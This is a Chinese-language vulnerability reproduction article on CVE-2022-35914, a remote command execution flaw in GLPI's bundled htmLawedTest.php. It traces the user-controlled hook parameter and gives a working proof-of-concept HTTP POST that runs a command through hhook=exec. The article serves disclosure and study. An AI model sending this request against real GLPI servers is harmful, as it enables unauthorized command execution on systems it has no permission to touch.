长亭百川云 - 文章详情

长亭百川云

技术讨论漏洞库IP 威胁情报在线工具

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

PeiQi文库

46

2024-07-13

原文链接

漏洞描述

GLPI是一个用于IT资产管理的开源软件,用PHP编写,并在GPL许可下发布。 作为一种开源技术,任何人都可以运行,修改或开发代码。GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于PHP htmlawed 模块中 允许 PHP 代码注入

漏洞影响

GLPI

漏洞复现

登录页面

出现问题的文件为 htmLawedTest.php, 来源于第三方库 PHP Labware

https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/

htmLawedTest.php 中接收参数并传入方法 htmLawed

跟进文件 htmLawed.php

if($C['hook']){$t = $C['hook']($t, $C, $S);}

这里可以看到参数均为用户可控参数,当控制参数 hhookexectext 为执行的命令时就导致了命令执行漏洞

验证POC

/vendor/htmlawed/htmlawed/htmLawedTest.php

访问页面获取到 sid 与 token 后再发送请求包

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 Host:  Accept: */* Accept-Encoding: gzip, deflate Content-Length: 88 Content-Type: application/x-www-form-urlencoded token=a79cf121bde57fe0e3cc0f247f77961a&text=id&hhook=exec&sid=h1c0vk004dvulal5nj8i6en44e

关注公众号

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号 想要加入交流群的师傅公众号点击交流群找WgpsecBot机器人拉你啦~

支持作者

关于文库

在线文库: http://wiki.peiqi.tech Github: https://github.com/PeiQi0/PeiQi-WIKI-Book 

文库动态

相关推荐
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
漏洞库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服
Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2